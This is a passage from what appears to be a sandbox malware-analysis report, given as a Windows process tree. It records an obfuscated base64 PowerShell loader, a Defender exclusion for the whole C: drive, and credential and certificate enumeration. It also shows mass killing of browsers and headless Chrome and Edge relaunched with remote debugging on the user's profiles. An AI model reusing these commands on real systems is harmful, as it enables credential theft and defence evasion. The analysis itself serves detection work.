Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                8⤵
                                • Blocklisted process makes network request
                                • Command and Scripting Interpreter: PowerShell
                                • Drops startup file
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: AddClipboardFormatListener
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3660
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                  9⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4604
                          • C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
                            "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
                            6⤵
                            • Executes dropped EXE
                            • Enumerates connected drives
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2628
                            • C:\Windows\system32\cmd.exe
                              "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3126557665.txt\""
                              7⤵
                              • NTFS ADS
                              PID:4460
                            • C:\Windows\system32\net.exe
                              "net" statistics workstation
                              7⤵
                                PID:5064
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 statistics workstation
                                  8⤵
                                    PID:3576
                                • C:\Windows\system32\vaultcmd.exe
                                  "vaultcmd" /list
                                  7⤵
                                    PID:5576
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    7⤵
                                    • Enumerates processes with tasklist
                                    PID:1384
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist" /FO CSV /NH
                                    7⤵
                                    • Enumerates processes with tasklist
                                    PID:4460
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    7⤵
                                    • Enumerates processes with tasklist
                                    PID:5432
                                  • C:\Windows\system32\cmdkey.exe
                                    "cmdkey" /list
                                    7⤵
                                      PID:5060
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                                      7⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      PID:4484
                                      • C:\Windows\system32\cmdkey.exe
                                        "C:\Windows\system32\cmdkey.exe" /list
                                        8⤵
                                          PID:4572
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        7⤵
                                        • Enumerates processes with tasklist
                                        PID:5772
                                      • C:\Windows\system32\certutil.exe
                                        "certutil" -store My
                                        7⤵
                                          PID:224
                                        • C:\Windows\system32\tasklist.exe
                                          "tasklist"
                                          7⤵
                                          • Enumerates processes with tasklist
                                          PID:4520
                                        • C:\Windows\system32\certutil.exe
                                          "certutil" -store -user My
                                          7⤵
                                            PID:3424
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              8⤵
                                                PID:4848
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                              7⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              PID:3700
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                8⤵
                                                  PID:5324
                                              • C:\Windows\system32\tasklist.exe
                                                "tasklist"
                                                7⤵
                                                • Enumerates processes with tasklist
                                                PID:2576
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  8⤵
                                                    PID:4428
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  7⤵
                                                  • Enumerates processes with tasklist
                                                  PID:4192
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  7⤵
                                                  • Enumerates processes with tasklist
                                                  PID:4536
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  7⤵
                                                  • Enumerates processes with tasklist
                                                  PID:4352
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Hide Artifacts: Ignore Process Interrupts
                                                  PID:5164
                                                • C:\Windows\system32\cmdkey.exe
                                                  "cmdkey" /list
                                                  7⤵
                                                    PID:992
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      8⤵
                                                        PID:3484
                                                    • C:\Windows\system32\tasklist.exe
                                                      "tasklist"
                                                      7⤵
                                                      • Enumerates processes with tasklist
                                                      PID:2060
                                                    • C:\Windows\system32\cmdkey.exe
                                                      "cmdkey" /list:TERMSRV/69.48.201.74
                                                      7⤵
                                                        PID:4376
                                                      • C:\Windows\system32\tasklist.exe
                                                        "tasklist"
                                                        7⤵
                                                        • Enumerates processes with tasklist
                                                        PID:5372
                                                      • C:\Windows\system32\taskkill.exe
                                                        "taskkill" /IM chrome.exe
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:4024
                                                      • C:\Windows\system32\tasklist.exe
                                                        "tasklist"
                                                        7⤵
                                                        • Enumerates processes with tasklist
                                                        PID:2704
                                                      • C:\Windows\system32\taskkill.exe
                                                        "taskkill" /IM msedge.exe
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:4128
                                                      • C:\Windows\system32\tasklist.exe
                                                        "tasklist"
                                                        7⤵
                                                        • Enumerates processes with tasklist
                                                        PID:2596
                                                      • C:\Windows\system32\taskkill.exe
                                                        "taskkill" /IM brave.exe
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:5440
                                                      • C:\Windows\system32\taskkill.exe
                                                        "taskkill" /IM opera.exe
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:3588
                                                      • C:\Windows\system32\tasklist.exe
                                                        "tasklist"
                                                        7⤵
                                                        • Enumerates processes with tasklist
                                                        PID:2888
                                                      • C:\Windows\system32\taskkill.exe
                                                        "taskkill" /IM vivaldi.exe
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:4628
                                                      • C:\Windows\system32\taskkill.exe
                                                        "taskkill" /IM firefox.exe
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:3152
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                            PID:5220
                                                        • C:\Windows\system32\tasklist.exe
                                                          "tasklist"
                                                          7⤵
                                                          • Enumerates processes with tasklist
                                                          PID:2420
                                                        • C:\Windows\system32\taskkill.exe
                                                          "taskkill" /IM dragon.exe
                                                          7⤵
                                                          • Kills process with taskkill
                                                          PID:4152
                                                          • C:\Windows\System32\Conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            8⤵
                                                              PID:5932
                                                          • C:\Windows\system32\tasklist.exe
                                                            "tasklist"
                                                            7⤵
                                                            • Enumerates processes with tasklist
                                                            PID:5564
                                                          • C:\Windows\system32\taskkill.exe
                                                            "taskkill" /IM maxthon.exe
                                                            7⤵
                                                            • Kills process with taskkill
                                                            PID:2732
                                                          • C:\Windows\system32\taskkill.exe
                                                            "taskkill" /F /IM chrome.exe
                                                            7⤵
                                                            • Kills process with taskkill
                                                            PID:4960
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              8⤵
                                                                PID:888
                                                            • C:\Windows\system32\taskkill.exe
                                                              "taskkill" /IM uc_browser.exe
                                                              7⤵
                                                              • Kills process with taskkill
                                                              PID:5088
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                8⤵
                                                                  PID:4536
                                                              • C:\Windows\system32\taskkill.exe
                                                                "taskkill" /F /IM Discord.exe
                                                                7⤵
                                                                • Kills process with taskkill
                                                                PID:5232
                                                              • C:\Windows\system32\taskkill.exe
                                                                "taskkill" /IM slimjet.exe
                                                                7⤵
                                                                • Kills process with taskkill
                                                                PID:4804
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  8⤵
                                                                    PID:2644
                                                                • C:\Windows\system32\taskkill.exe
                                                                  "taskkill" /F /IM DiscordCanary.exe
                                                                  7⤵
                                                                    PID:1448
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /IM cent_browser.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:2296
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /F /IM DiscordPTB.exe
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:2780
                                                                  • C:\Windows\system32\taskkill.exe
                                                                    "taskkill" /IM epic.exe
                                                                    7⤵
                                                                      PID:1952
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /F /IM DiscordDevelopment.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:3400
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM torch.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:4732
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM whale.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:2184
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM 360browser.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:4696
                                                                    • C:\Windows\system32\taskkill.exe
                                                                      "taskkill" /IM qqbrowser.exe
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:1816
                                                                      • C:\Windows\System32\Conhost.exe
                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        8⤵
                                                                          PID:2060
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        "taskkill" /IM browser.exe
                                                                        7⤵
                                                                        • Kills process with taskkill
                                                                        PID:264
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        "taskkill" /F /IM chrome.exe
                                                                        7⤵
                                                                        • Kills process with taskkill
                                                                        PID:4024
                                                                      • C:\Windows\system32\taskkill.exe
                                                                        "taskkill" /F /IM msedge.exe
                                                                        7⤵
                                                                        • Kills process with taskkill
                                                                        PID:3948
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          8⤵
                                                                            PID:2704
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM brave.exe
                                                                          7⤵
                                                                          • Kills process with taskkill
                                                                          PID:5032
                                                                        • C:\Windows\system32\taskkill.exe
                                                                          "taskkill" /F /IM opera.exe
                                                                          7⤵
                                                                            PID:3028
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM vivaldi.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:3452
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM firefox.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:4128
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM dragon.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:5656
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM maxthon.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:5416
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM uc_browser.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:4764
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM slimjet.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:1536
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM cent_browser.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:4488
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM epic.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:2856
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM torch.exe
                                                                            7⤵
                                                                            • Kills process with taskkill
                                                                            PID:4312
                                                                          • C:\Windows\system32\taskkill.exe
                                                                            "taskkill" /F /IM whale.exe
                                                                            7⤵
                                                                              PID:1072
                                                                            • C:\Windows\system32\taskkill.exe
                                                                              "taskkill" /F /IM 360browser.exe
                                                                              7⤵
                                                                                PID:1388
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /F /IM qqbrowser.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:5100
                                                                              • C:\Windows\system32\taskkill.exe
                                                                                "taskkill" /F /IM browser.exe
                                                                                7⤵
                                                                                • Kills process with taskkill
                                                                                PID:4840
                                                                              • C:\Windows\system32\tasklist.exe
                                                                                "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                                                7⤵
                                                                                • Enumerates processes with tasklist
                                                                                PID:4588
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=48755 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
                                                                                7⤵
                                                                                • Uses browser remote debugging
                                                                                • Enumerates system info in registry
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:4052
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb1497dcf8,0x7ffb1497dd04,0x7ffb1497dd10
                                                                                  8⤵
                                                                                    PID:3416
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=1992,i,15403223256711954637,1788389377619437959,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1984 /prefetch:2
                                                                                    8⤵
                                                                                    • Modifies registry class
                                                                                    PID:2712
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2240,i,15403223256711954637,1788389377619437959,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2236 /prefetch:3
                                                                                    8⤵
                                                                                      PID:5760
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2468,i,15403223256711954637,1788389377619437959,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2376 /prefetch:8
                                                                                      8⤵
                                                                                        PID:4808
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=48755 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2984,i,15403223256711954637,1788389377619437959,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2976 /prefetch:1
                                                                                        8⤵
                                                                                        • Uses browser remote debugging
                                                                                        PID:1072
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=48755 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,15403223256711954637,1788389377619437959,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3180 /prefetch:1
                                                                                        8⤵
                                                                                        • Uses browser remote debugging
                                                                                        PID:4996
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=48755 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3900,i,15403223256711954637,1788389377619437959,262144 --disable-features=PaintHolding --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3916 /prefetch:1
                                                                                        8⤵
                                                                                        • Uses browser remote debugging
                                                                                        PID:5972
                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                      "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                                                      7⤵
                                                                                      • Enumerates processes with tasklist
                                                                                      PID:7072
                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                      "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                                                      7⤵
                                                                                      • Enumerates processes with tasklist
                                                                                      PID:3100
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=49062 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
                                                                                      7⤵
                                                                                      • Uses browser remote debugging
                                                                                      • Checks processor information in registry
                                                                                      • Enumerates system info in registry
                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                      PID:5028
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x228,0x22c,0x230,0x224,0x354,0x7ffb0f4df208,0x7ffb0f4df214,0x7ffb0f4df220
                                                                                        8⤵
                                                                                          PID:3532
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2544,i,9541402459245725751,11466482440319032895,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2536 /prefetch:2
                                                                                          8⤵
                                                                                          • Modifies registry class
                                                                                          PID:6520
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2580,i,9541402459245725751,11466482440319032895,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2460 /prefetch:3
                                                                                          8⤵
                                                                                            PID:6580
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2584,i,9541402459245725751,11466482440319032895,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2500 /prefetch:8
                                                                                            8⤵
                                                                                              PID:6696
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=49062 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3396,i,9541402459245725751,11466482440319032895,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3392 /prefetch:1
                                                                                              8⤵
                                                                                              • Uses browser remote debugging
                                                                                              PID:7164
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=49062 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3600,i,9541402459245725751,11466482440319032895,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3592 /prefetch:1
                                                                                              8⤵
                                                                                              • Uses browser remote debugging
                                                                                              PID:5400
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4592,i,9541402459245725751,11466482440319032895,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4528 /prefetch:8
                                                                                              8⤵
                                                                                                PID:7784
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
